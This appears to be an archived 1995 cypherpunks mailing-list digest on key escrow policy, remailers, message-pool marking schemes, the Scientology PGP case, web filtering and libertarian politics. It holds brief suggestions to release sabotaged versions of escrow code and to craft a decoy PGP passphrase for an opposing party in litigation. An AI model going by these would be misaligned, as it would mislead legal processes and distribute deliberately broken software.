Sep 8 15:19:00 1995 From: cme at acm.org (cme at acm.org) Date: Fri, 8 Sep 95 15:19:00 PDT Subject: Key Escrow Papers In-Reply-To: <199509082016.NAA22536@comsec.com> Message-ID: <9509082216.AA12075@tis.com> >From: John Young >Date: Thu, 7 Sep 1995 20:55:49 -0400 > Note 1: It was Michael Nelson of the White House who said > that the reason to maintain the 64-bit limit for export was > because the key escrow methodology had not yet been proven > reliable and that the security agencies insisted on the > relatively weak system in case key escrow failed. Clint Brooks of NSA repeated this assertion, at least once. He said it during the August 17, 1995 meeting as well. I find this interesting, not least as a violation of security. This amounts to an open declaration that NSA can break through 64-bit keys. Could it be that NSA was miffed at being upstaged in the announcement of breaking through a 40-bit key and wanted to up the ante? .... :-) - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From cme at TIS.COM Fri Sep 8 15:25:49 1995 From: cme at TIS.COM (Carl Ellison) Date: Fri, 8 Sep 95 15:25:49 PDT Subject: Day 2, nist GAK meeting In-Reply-To: <199509082025.NAA22581@comsec.com> Message-ID: <9509082219.AA12139@tis.com> >Date: Fri, 8 Sep 1995 06:36:00 -0700 >From: pfarrell at netcom.com (Pat Farrell) >Penny Brummitt of NSA was to talk about Clipper's key escrow agents, >but called in sick. I didn't catch the name of the replacement. It was Jan Manning. He's NSA's person designing the Law Enforcement decrypt box and possibly other related equipment for the Clipper program. From stewarts at ix.netcom.com Fri Sep 8 15:39:46 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 15:39:46 PDT Subject: Slightly faster checking for encrypted messages to me Message-ID: <199509082239.PAA20047@ix8.ix.netcom.com> At 10:31 AM 9/5/95 -0800, Doug Barnes wrote to Hal and us: >If two entities want to communicate via a message pool, >without worrying about traffic analysis, but don't want >the overhead of trying to decrypt every headerless >message to the pool, then they can do the following: > >1) In a "headered" message, one of the entities (A) sends > a collection of large random numbers to be used as return > markers, encrypted with the public key of the desired > correspondent (B). > >2) B can then respond to A with an essentially headerless > message prefixed with one of the numbers send by A. > This initial message should contain a list of similar > numbers for B, that A can use to send messages to B. There's a way to get this without sending as much data - using a relative of S/Key (probably not affected by S/Key patent.) A sends B two random numbers, thing1 and thing2. B's headers include a prefix of n, hash( thing2, hash^n(thing1) ) where hash^n is n rounds of hash, e.g. MD4 or MD5. Thing2 can possibly be a well-known string instead. Assuming there's no special relationship between thing2 and the hash function, it should be hard to derive hash( thing2, hash^n(thing1) ) from hash( thing2, hash^(n-1)(thing1) ) presumably as hard as inverting the hash. (Brute-force is an option if thing1 is not chosen well, involving a few hundred hashes on a few million popular wimpy passwords, but S/Key suffers from the same weakness.) Including n in the header is a mild message-correlation risk, though messages don't have to be sent with consecutive n's (at a cost of more runs of hash per message.) This lets you recover easily from lost messages. There's also the mild risk that the thing1 and thing2 keys need to be stored, though Doug's method also suffers from that. It is also possible to use S/Key itself - the original message from B to A contains Xn = hash^n(key) and maybe n. The next message contains Xn-1 = hash^(n-1)(key), which A checks by hashing it and looking in his table of messageids for Xn. A can recover from small numbers of lost messages by hashing a few times. (Since you're not using it for authentication, is it covered by the S/Key patent?) This method has the weakness that Traffic Analysts can also correlate messages by hashing the fields and comparing with previous. One workaround is to for B to also send A the keys for some simple encryption method E such as "Ek = m xor k" and use Xn = Ek(hash^n(key)). This requires A to perform an xor and a hash for each correspondent (B, C, D, ...), but is probably secure enough. Alternatively, since the numbers are fairly short, you can use "Ek = m^k mod p", but that's starting to look like work :-). #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 8 15:40:14 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 15:40:14 PDT Subject: University logging mail to anon.penet Message-ID: <199509082239.PAA20081@ix8.ix.netcom.com> At 07:30 PM 9/6/95 -0700, you wrote: >Our local University apparently has been logging ALL mail to anon.penet, >including faculty, students, and off-campus users. Any time you're using non-encrypted remailers, you've got no protection against people doing that; even with encrypted messages they can still tell who's sending mail to anon.penet.fi, but can't tell who the messages are forwarded to. There may be ECPA issues involved, especially if CalPolySLO is a government- run university; the sysadmins certainly need to learn some ethics... If your ombudsperson can be reached by email, a note through anon.penet.fi explaining the usefulness of anonymous remailers for sensitive communications might be educational. After all, it's a technique they might want to use for handling sexual harassment cases or other problems requiring two-way communications. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From kqb at whscad1.att.com Fri Sep 8 15:47:10 1995 From: kqb at whscad1.att.com (Kevin Q Brown +1 201 386 7344) Date: Fri, 8 Sep 95 15:47:10 PDT Subject: GAK Hacks and Position Surveillance Message-ID: <9509082244.AA12403@ig1.att.att.com> > GAK Hacks! > We did it for SSL, let's do it for GAK. > Demonstrate that superencryption (encrypting within a GAK wrapper) defeats > GAK. And other kinds of hacks, including releasing "damaged" (inoperative) > versions of the proposed code (when it becomes available). Tim, That's a start. Superencryption can protect the _content_ of the conversation, but it will not prevent _traffic analysis_. That is an important issue because, as I explain below, in our increasingly wired world, effective traffic analysis may become a _position_ escrow system, except that there won't even be any escrow. A GAK Hack that combines superencryption with a method to defeat traffic analysis would raise a lot more eyebrows than superencryption alone. Unfortunately, since we don't yet know what kind of LEAFs will be in the next-generation GAK proposal, I can only refer to some comments made awhile ago about Clipper-based traffic analysis: Date: Mon, 14 Mar 94 10:36:05 EST From: smb at research.att.com > The LEAF can be decrypted with just the family key; from what's been > disclosed so far, local law enforcement agents will be able to do that > without contacting the escrow sites. The LEAF contains the unit id of > the chip, independent of what phone number it's being used from, ... Imagine someone using a GAK/LEAF communication device while travelling throughout the day. Especially if the communications are wireless, no court order will be needed to track position during his/her journeys because a packet sniffer armed with the family key could detect any of his/her communications automatically. You may wonder "what packet sniffer could track communications like that"? Maybe I'm wrong, but isn't that what the recent Digital Telephony legislation was for? Now let's return to a recent message from tcmay at got.net: > The pernicious nature of the "escrow" idea, ... is that it says that > surveillance is not so bad after all, because the results of the escrow > will not be looked at except when "justified." ... Or perhaps, once a GAK system with some kind of LEAFs is in place, no justification at all will be needed to accomplish efficient and fully automated massive position surveillance. Maybe key escrow is just a red herring to distract us from position surveillance? Of course, we can assume that these LEAFs will not be as vulnerable to forging as Matt Blaze demonstrated for Clipper (Tessera?). First we had: GAK = Government Access to Keys. Perhaps now we have: GULPS = Government Unlimited License for Position Surveillance? Frankly, I wouldn't be surprised if I have overstated the threat and more technically knowledgeable minds on this list will expose the flaws in my reasoning. Please do. Kevin Q. Brown kevin.q.brown at att.com kqb at whscad1.wh.att.com From dl at hplyot.obspm.fr Fri Sep 8 16:08:22 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Fri, 8 Sep 95 16:08:22 PDT Subject: Cyphernomicon In-Reply-To: Message-ID: <9509082307.AA05637@hplyot.obspm.fr> -----BEGIN PGP SIGNED MESSAGE----- Dar Scott writes: [...] > Here is a summary of what I learned: [...] > FTP sites: > ftp.netcom.com/pub/tc/tcmay/CP-FAQ > The original. "crowded" (I couldn't open an FTP port.) Got it from there, anyone feel free to fetch : ftp://hplyot.obspm.fr/net/CP-FAQ.gz > ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz > ftp.goblin.punk.net/pub/docs/cypherfq.zip > 28.8 bps modem, newline=CR, but .zip will change to newline=CRLF > About 432Kbytes. > (On PPP at 14.4 it took me 6+ minutes to get it.) > "until someone posts it on a site with higher bandwidth" hplyot's links to the world is 2mbit/s, feel free to fetch it from here... > HTML sites: > http://www.oberlin.edu/~brchkind/cyphernomicon/ > http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ > text. very responsive and fast (6 minutes for my 14.4 connection). > http:/www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ > text > http://www.msen.com/~lwp/Cyphernomicon.gz > About 432Kbytes. Need g[un]zip utility. (here, typing get CP-FAQ instead of get CP-FAQ.gz will gunzip it on the fly, but you shall IMO get gzip for your system anyway :-) hope this helps regards dl - -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAgUBMFDMrXk52/beodHxAQFqnwQAjOY/nDOoUweYo5Xc7XjZPpRDFWqKuErp nWgnmdrSeJPq8oyOeBtMZActfLoJFFtkcEWlooLasG+RCLhqaTA32nc75/Nv2A0s ODQYj6Z2YhrzocDCKDtWegh5mNUEeWlIGnzRNSq/1lJV4cfLaHDzLoq+7ypt/epi TDmOZMVXmLU= =XKUy -----END PGP SIGNATURE----- From liberty at gate.net Fri Sep 8 16:24:58 1995 From: liberty at gate.net (Jim Ray) Date: Fri, 8 Sep 95 16:24:58 PDT Subject: [NOISE]Re: ECPA (Was: University logging mail to anon.penet.fi) Message-ID: <199509082321.TAA28363@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- > Whatever do the workings of an hypothetical "libertarian" >society have to do with the "Libertarian Party"? Certainly, it would >be nice if the latter were working towards the former, but the two are >not the same. So? (They are as close as we are going to get.) > I know of quite a few `l'ibertarians who strongly object to >the `L'ibertarian Party pledge. They were in the minority in my party, even *before* the OK City mass-murder proved why we have such a pledge (to distance ourselves from those who would initiate violence). This reply, to a reply to the ENTIRE list, would probably have been better sent privately. The reason that I first sent to the whole list was as much to encourage other posters to proofread their posts as for any libertarian political purpose. PS Interesting letter to the editor RE: Jerry Garcia in today's WSJ. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMFDPzG1lp8bpvW01AQGXRwP9Hxzigw1OCcL1L1u3jSlUvAMtzVPhDkwd 99czrw9jqSXfMhdouGNP3IwjZLXhF0AlmV+chMmMC7Z0xy/Qjznhgut8jIS7IpQN KsXLVwWLCWk0U8nN27WuHVQoImfIG2ONLUUaM36pg1GGFTdQLiJauif2ZYDL6JSJ +E1v7dmnLMc= =xrhl -----END PGP SIGNATURE----- Regards, Jim Ray "As sensitive and broad-minded humans, we must never allow ourselves to be in any way judgmental of the religious practices of other people, even when these people clearly are raving space loons." -- Dave Barry ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray ------------------------------------------------------------------------ Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf ________________________________________________________________________ From alano at teleport.com Fri Sep 8 16:34:28 1995 From: alano at teleport.com (Alan Olsen) Date: Fri, 8 Sep 95 16:34:28 PDT Subject: ON OFF-TOPIC [NOISE] Message-ID: <199509082334.QAA16208@desiree.teleport.com> >Is there something authoritarians want, that we don't mind them having, >for which crypto would be an enabling technology? Some of them _might_ >be interested in having better encryption for TV channels so that kids >can't watch a NotForKids channel (though many of them might rather ban >it outright) or so they can easily control whether their kids get to >watch MTV even though the V-Chip doesn't have a NoisyKidsMusic bit. >Perhaps they'd enjoy having reputation systems available, so they can >easily filter out politically incorrect material, or do a thumbs-down >on things they disapprove of, or let the Baptists and Catholics and >Anti-Baptists all have their own convenient ratings. MTV has a pretty funny parody of the V-chip concept that they have run on occasion. They are advertising that kids should get the MTV-chip which prevents parents from watching MTV while the kids are at school. Their slogan is "keep mind control at home where it belongs". (I find it interesting that they have an anti-censorship stance, yet censor many of their videos. Kind of hypocritical...) | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites | Disclaimer: | |all mankind free in one-key-stenography-privacy!"| Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From adwestro at ouray.cudenver.edu Fri Sep 8 17:45:44 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Fri, 8 Sep 95 17:45:44 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: <9509081654.AA03407@ch1d157nwk> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Tonight's local news included an interesting blurb about this case. The judge refused to order Wollersheim to disclose his passphrase, since the encrypted material comprised names of Co$ critics who could then be targeted by the Church. And the secret (and copyright!) $criptures were read in court and excerpts broadcast on the news, "close-captioned for the hearing-impaired." All the entertaining stuff some of us have been reading on the net was there: aliens transported to earth, volcanoes h-bombed, thetans...I laughed my ass off. A bigtime win for PGP and encryption generally, and a major PR debacle for the $cienos. Kute Korrespondences Koda: Tomorrow, Sept. 9, there will be protests worldwide at Co$ centers. I was cleaning out some paperwork and disk file archives recently, and noticed that the ViaCrypt and Austin Code Works subpoenas were dated Sept. 9, 1993. Grady Ward of ACW has, of course, been a major Co$ antagonist, making good use of PGP and the Cypherpunks remailers. The old message I found detailing these subpoenas was from this list's sometime visionary, L. Detweiler. Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFDh51RRFMq4NZY5AQEO/gP/VgOEP8LpcrrIno2yj3oqD7zHc3a0d5If GC/ze1b6frpWPKo2mIb7IiZQzQ8rkZmky07PR9MV6jPO4S8UCpwix/ylgV1kGWmd WWWe4t8xVfHc2wJGS7qjRvkt8PDvgPkcHWktxOHkASl9cemscwYJbGyXq1BkCJCT Mkgv7cSClDM= =Nuz5 -----END PGP SIGNATURE----- From tcmay at got.net Fri Sep 8 17:53:26 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 8 Sep 95 17:53:26 PDT Subject: Libertarian Party and Crypto Anarchy Message-ID: [I've changed the name of this thread. Somehow the title "Re: [NOISE]Re: ECPA (Was: University logging mail to anon.penet.fi)" did not quite cut it. I really wish folks would take the effort to change thread names when appropriate.] At 11:24 PM 9/8/95, Jim Ray wrote: >They were in the minority in my party, even *before* the OK City >mass-murder proved why we have such a pledge (to distance ourselves >from those who would initiate violence). As a point of reference, I usually vote Libertarian, even though it's pointless. And I'm even registered "Libertarian Party," which matters even less. (I've also changed my registration to Democratic or Republican when I wanted to influence in some tiny way their primaries...as when I switched to Democrat so as to vote for Jerry Brown, mainly because of his flat tax proposal.) But I've never signed the LP "pledge" as I dislike such blanket pledges. And I dislike the notion of pledges per se. So, I'm registered to the Libertarian Party, and usually vote Libertarian. But I am not allowed to be a dues-paying member and get their worthless newsletters, which suits me fine. (Anybody prepared to bomb a government building is not going to balk at signing such a pledge, so it does little good. Personally, I think the "pledge" is profoundly anti-libertarian, and smacks of McCarthyism.) Your mileage may vary. And I place a lot more faith in crypto activism having an effect than in the LP having an effect. Crypto and crypto anarchist ideas are already creeping into the LP belief system, as reflected in articles in "Reason" and "Liberty." And David Friedman (author of "The Machinery of Freedom," and son of Milton) gave a talk recently in L.A. entitled "Crypto Anarchy and the State." --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cman at communities.com Fri Sep 8 18:00:00 1995 From: cman at communities.com (Douglas Barnes) Date: Fri, 8 Sep 95 18:00:00 PDT Subject: GAK Message-ID: > >If too much attractive stuff is available by loss of any one public key, >that key gets attacked. To compensate for this, the TIS DRC generates new >public keys periodically to give out to new (or old) customers. > >However, a government warrant which demands the DRC's private key collection >would gain quite a harvest. The economics of the situation seem to dictate that whether you have one key or N keys, it's going to be cheaper to subvert the escrow agent (you guys or whoever) than it is to brute-force even one key. Therefore I'm not clear on how using multiple keys buys you much against the most probable threat -- opponents getting physical access to keys or the subversion of personnel who have legitimate access. Of course, it's still a good policy, reducing the payoff to those too timid to try the direct approach. But I think this threat is significantly less likely than a disgruntled employee selling the DRC private keys on a real instantiation of the Blacknet model, without even being solicited. You may feel very comfortable with the personnel and procedures you have in place now, but auditing and vetting systems are notorious for scaling very, very poorly. You may feel you can vouch for the trustworthiness of everyone at TIS now, but this sort of familiarity also scales very poorly. And clearly, were this to become commercially significant, it would need to scale quite a bit. Douglas Barnes Electric Communities From nobody at REPLAY.COM Fri Sep 8 19:10:34 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 8 Sep 95 19:10:34 PDT Subject: Web Exon A-rate Message-ID: <199509090210.EAA17069@utopia.hacktic.nl> WS Journal, Sept. 8, 1995. Cleaning the Web: Companies to Seek Pornography Blocker Array of Technology Firms Will Join in Effort to Let Parents Screen the Internet By Jared Sandberg Some of the high-tech industry's biggest companies are banding together in a broad-based consortium to develop a way for Internet users to screen out pornography and other offensive material. The group, whose creation is expected to be announced on Monday, is believed to include International Business Machines Corp. and Microsoft Corp., telecommunications giants AT&T Corp. and MCI Communications Corp., on-line firms America Online Inc. and Netscape Communications Corp. Entertainment heavyweights Time Warner Inc. and Viacom Inc. also have been approached. People familiar with the plans said the consortium hopes to develop industrywide standards for obscenity-blocking technology as a way to forestall much-criticized proposals from federal regulators. It amounts to an effort to develop a voluntary Internet equivalent of the "v-chip" that has been proposed as a way for parents block sex-and-violence-laden TV programs. The venture will pursue a system that would allow Internet users -- such as teachers or parents -- to prevent pornography from being accessed by children. The group will be led by the World Wide Web Consortium at the Massachusettes Institute of Technology, executives said. The consortium, funded by roughly 80 companies, aids in the development of the Web, the multimedia portion of the Internet, by producing technical specifications and software. Various companies have worked on ways to shield children from indecent material. The new consortium will pursue an overarching method available to all Internet players -- software firms, access providers and on-line services. MIT will coordinate this "umbrella organization to prevent industry infighting," said one executive. "It's aimed at creating a standard that all the software companies can develop for." A separate project by Microsoft and Netscape, together with two smaller firms, SurfWatch Software Inc. and Progressive Networks Inc., will now be folded into the new consortium, another executive said. The effort follows such proposals as the antipornography provision of Sen. James Exon (D., Neb.), which won overwhelming support in the Senate and would slap prison terms on people who make "indecent" remarks on-line. Most of the proposals have been met with scorn from the Internet industry. Executives have said that legislators could cripple the commercial growth of the Internet before it emerges from infancy. ------ From dsc at swcp.com Fri Sep 8 20:09:14 1995 From: dsc at swcp.com (Dar Scott) Date: Fri, 8 Sep 95 20:09:14 PDT Subject: Libertarian Party and Crypto Anarchy Message-ID: Timothy May wrote, >And David Friedman (author >of "The Machinery of Freedom," and son of Milton) gave a talk recently in >L.A. entitled "Crypto Anarchy and the State." Is text available for that talk? Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From dl at hplyot.obspm.fr Fri Sep 8 20:32:43 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Fri, 8 Sep 95 20:32:43 PDT Subject: [NOISE/Fun] some 'special' primes Message-ID: <9509090332.AA06578@hplyot.obspm.fr> -----BEGIN PGP SIGNED MESSAGE----- I hope this is not extremely already know,... but, seeing on the list a sig with someone claiming to have the 'last' prime, I played a bit this nite and searched for the *first* alphabetically sorted prime (once written as spelled, sorted like with unix's sort) dependending on the language : Easiest: English : 11 : eleven A bit more fun : German : 811 (dunno how to write it, but it starts with an "a") Exotic one : slovenian: 10019 desettisocdevetnajst And..... the tricky one, which I hope is the good one (challenge: find one 'before') : French (and possibly spanish/italian,...too) : 105 105 000 105 167 (it spells cent cinq mille cent cinq milliards cent cinq mille cent soixante sept) [note that 'billion' is not used for numbers in common language, and that soixante-dix has a - and not a space :-) ] More languages ? better results anyone :-) ? Regards dl ps: I used gnu MP lib for my hack when I hit the 2^32 limit, but it's rather slow... (ok, its prolly due to my lasy prime algo too, but...) is there some well-known fast mp lib to play around with primes ? (should I look and extract PGP's ?) - -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom 105 105 000 105 167 -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAgUBMFEKvXk52/beodHxAQH+cgQAwUzDczvIzXaBzYx/Q5oerXFZ/ABDjp8b Sz20qgBmB3BP9jE8GbibqIF1FOExS2r3irg4PQHhUwuX7wWT/deo8KzWMrb3C2fi X3kMbtWM9hQNHJ1mRpAE41M1NuHgk8xM43WbkZcLyYOPXXWSAAs0qc+bdNamtUDT iujkF9fQxck= =mkaz -----END PGP SIGNATURE----- From mike at uac.net Fri Sep 8 20:58:55 1995 From: mike at uac.net (Michael) Date: Fri, 8 Sep 95 20:58:55 PDT Subject: [NOISE/Fun] some 'special' primes In-Reply-To: <9509090332.AA06578@hplyot.obspm.fr> Message-ID: <199509090358.XAA18311@mail1.uac.net> > A bit more fun : German : 811 (dunno how to write it, but it starts > with an "a") acht hundert uenf (I think) --Michael From dsc at swcp.com Fri Sep 8 21:07:44 1995 From: dsc at swcp.com (Dar Scott) Date: Fri, 8 Sep 95 21:07:44 PDT Subject: Web Exon A-rate Message-ID: Somebody passed this along: >WS Journal, Sept. 8, 1995. > >Cleaning the Web: Companies to Seek Pornography Blocker > >Array of Technology Firms Will Join in Effort to Let >Parents Screen the Internet > >By Jared Sandberg [snip] This is a good idea. And maybe cryptography can get involved--see below. As a parent it is my responsibility to control what comes into the house and to determine what limited view of the net my kids see. The screening software to do this could be in my home or part of a service of my service provider. A few companies have some simple products for doing this. Most are discouraged by threats from congress to reduce the market need. Most products use a simple red list to block access according to literature sent me. Some look for key words. Normally, I would say that it is very premature for standards work. It would be good to see more ideas tried. The Exon threats probably do not allow this, so I see this news as a good thing. One place to start is the web. Depending on the kid's age and other factors I would want to have different limitations on what the kid sees. Older kids might just get warnings. I would like--for the little ones--to limit the view to some combination of sites listed on green lists. The view for slightly older kids might use red lists to exclude sites instead. (I really would want to create some logical combination of lists for each kid.) Organizations can compete for the list market. I might use these in what ever combination I like and also add my own. It is important to note that the kinds of things I would like to screen out or in might be different from what the next person would like to screen out or in. (I put little faith in content screening.) The problem might be in getting huge lists every week. And pages that seemed fine once could have changed. Current red list subscriptions are expensive--it is easier to keep kids off the computer. >>>>>> the part that mentions cryptography >>>>> As an alternative to green lists consumer organizations and do-gooder organizations might certify pages. These might be virtual green lists. Each web page would have the cert built in--perhaps in comments to allow most viewers to work. Instead of checking a list in this case, the screening software would ask the page to verify itself. If the cert was PGP based, then every home doing this would have to have PGP. The screening product could use PGP. Perhaps PGP would be slow. There might be some way to check signatures that is faster and does not have patent limitations. It would be nice if it was possible for the browser to see the first screenful without waiting for the screener to see the entire page. Only those that especially want to make their sites available to kids of picky parents would get the pages certified. Maybe just sending in e$3 would do it. Or e$50 to get to the head of the list. In whatever standards that come about, it is important that only those involved in the screening process pay the price ($, delays). Everybody else should be able to carry on. I do worry that some quick standards would be put into place and that innovation in this area would then become arrested. Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From sameer at c2.org Fri Sep 8 21:55:45 1995 From: sameer at c2.org (sameer) Date: Fri, 8 Sep 95 21:55:45 PDT Subject: GAK Hacks In-Reply-To: <199509081611.JAA05733@jobe.shell.portal.com> Message-ID: <199509090450.VAA19757@infinity.c2.org> > > One would be to create a patcher which would let you change the set of > certificate authorities accepted by the browser. Currently the browser > accepts at least one (an internal Netscape test CA) which is not needed > by end users. Maybe its public key could be statically overwritten by > the patch program with the public key of the replacement CA. This sounds > simple and safe. The patch program can confirm that the data being > changed matches the test CA. Where is the public key for the test CA available? Seems pretty trivial to take those bits and just do a bit compare against your netscape binary to find out where the key is stored within the binary.. -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From cme at clark.net Fri Sep 8 23:07:24 1995 From: cme at clark.net (Carl Ellison) Date: Fri, 8 Sep 95 23:07:24 PDT Subject: Open letter to Geoff Greiveldinger, DoJ Message-ID: <199509090607.CAA02659@clark.net> I just posted the following. I'll have to wait to see if the moderator accepts it. Date: Sat, 9 Sep 1995 01:11:06 -0400 From: Carl Ellison To: risks at csl.sri.com Subject: Open letter to Geoff Greiveldinger, DoJ NIST (the National Institute of Standards and Technology) held a two day public meeting on September 6 and 7, 1995 to discuss Software Key Escrow as a possible means of achieving export of cryptography. In the morning of 9/7, Goeff Greiveldinger of the Department of Justice gave a description of the kinds of crimes which DoJ wants to use wiretapping to solve. He closed this litany of lawbreaking with the assertion that software manufacturers don't want to provide products which allow such lawbreakers to keep their criminal evidence hidden from law enforcement. I'm sorry to disillusion you, Geoff, but I *do* want to make such systems. Would you have Ryder stop renting trucks because some terrorist decided to fill one with explosives and kill many innocent children? Would you have Americans stop making automobiles because bank robbers have been known to use cars for getaways? Would you have all new buildings constructed with FBI microphones in every wall because some criminals meet in private rooms in order to plan crimes? When an American company sweeps its conference room for bugs, finds some and destroys them, it doesn't matter whether those bugs were planted by industrial spies or the FBI. The company has a right to eliminate them. When that company ties two such conference rooms together by video-conference equipment and encrypts the line between them using strong link encryption, it is performing the same defensive operation in cyberspace. It is protecting itself from spies and it doesn't matter that the wiretaps it frustrates might be illegal ones by industrial spies or legal ones by the FBI. The right to attempt to achieve privacy is a long-standing one in this country and not one to allow to be lost. When I design and build systems for privacy for my customers, I am providing products for law-abiding, honest people. I am aware of criminals, of course. Criminals are the threats against whom I protect my customers. These criminals are usually not in the government but that doesn't mean that I believe I should offer my honest customers up for a strip-search in cyberspace. The law enforcement agencies of this free country have no right to expect blanket access to the ciphertext of citizens. It will take legislation to get that right and I will do everything in my power to keep such legislation from passing. Barring such legislation, I will make sure that honest American citizens have cryptography with which to attempt to maintain their privacy, even from the government. We have the right to attempt to keep a secret from government agencies and continuous demonstration of that right is an important part of this free country. On the other hand, I am sympathetic to law enforcement officers. I have several friends in that business. I have asked my friends and acquaintances who do surveillance (2 IRS agents investigating organized crime for tax evasion; 2 undercover cops in Boston's highest drug neighborhood; 1 DEA agent in the midwest) if they ever encounter encrypted communications or files. They don't. Neither does anyone in their offices. Of course, even if they did it would remain so important to preserve our right to attempt to keep secrets from the government that their frustration would just have to be accepted. The fact that this isn't a real problem makes my decision that much easier. I am left with no moral qualms at all. In summary, criminals are so few that I will not design for them. I will not treat my vast majority of honest users as if they were criminals just because some criminal might someday use my product and frustrate you. ObRisk: We run the risk of losing our fundamental right to attempt to keep a secret from the government -- a practice we need to preserve in order to protect ourselves from criminals in cyberspace. There are powerful forces in the US government attempting to cajole us into giving up that right. [see http://www.clark.net/pub/cme/html/nist-ske.html for more on this subject] From greg at ideath.goldenbear.com Sat Sep 9 00:44:52 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sat, 9 Sep 95 00:44:52 PDT Subject: Scientology/Wollersheim as test case for key disclosure Message-ID: <199509090742.AA15129@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Andrew Loewenstern writes: > > Modemac writes: > > Mr. Wollersheim has stated that he will go to jail before he reveals > > his encryption key. > [...snip...] > > Call this one: BIG WIN FOR PGP! > > Could this be it? The test case for forced key disclosure? The > Scientologists seem very determined and already have a grudge against > Wollersheim (according to a web page I saw Co$ owes him several million from > a settlement). Has Co$ filed against Wollersheim over this yet? > > If this does go to court and forcing Wollersheim to reveal the key becomes a > central issue, is this the test case "we" want? Is this a "BIG WIN FOR PGP!" > or not? Well, since it's (apparently) a civil case against Wollersheim, the potential Fifth Amendment self-incrimination issues may be murkier, so this may not be a good test case for the criminal context. In federal civil trials, material reasonably likely to lead to the discovery of admissible evidence is discoverable unless there's an applicable privilege - this means that in a civil case, a defendant may be forced to hand over material likely to expose them to liabilty. (The Fifth Amendment privilege against criminal self-incrimination still applies). I'm not sure that key disclosure will even be necessary - the Church (or whatever annoying tentacle of it is suing Wollersheim) is entitled to, for example, "a copy of . . . all documents, data compilations, and tangible things in the possession, custody, or control of the party that are relevant to disputed facts alleged with particularity in the pleadings" (Fed. R. Civ. P. 26(a)(1)(B)). I don't see why Wollersheim couldn't comply with the discovery rules by providing plaintext copies of all relevant information, unless for some reason the passphrase is itself relevant. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFFFG33YhjZY3fMNAQGmLAP/S412cBRTRFRWou6mVjh7jbT9O3CIUPEB oFuDLNy7pQR2ZaR5JOzSsCv9d96CpGdVjIWUxhP/Fz6tN3ZP7LuCXBssoIuiyuEp z2e+LQthjcksUDqipR+QggIhN3hU66esg14WCF61yjwpXCukn13cOISYtBHRjc9g sEiN0SXZ4tw= =knU6 -----END PGP SIGNATURE----- From cypherpunks at toad.com Sat Sep 9 01:46:19 1995 From: cypherpunks at toad.com (cypherpunks at toad.com) Date: Sat, 9 Sep 95 01:46:19 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: <9509081654.AA03407@ch1d157nwk> Message-ID: <199509090841.BAA01249@miron.vip.best.com> > >Tom Rollins writes: >> If this is the file that the Co$ is trying to crack, then what the >> is being asked for is a pass phrase that can be handed to the Co$ >> that will pass the PGP valid key check and still not decrypt the >> data to anything usefull. > >Well, I don't have the PGP 'conventional' encryption format memorized, but >there is probably a constant after the IV that 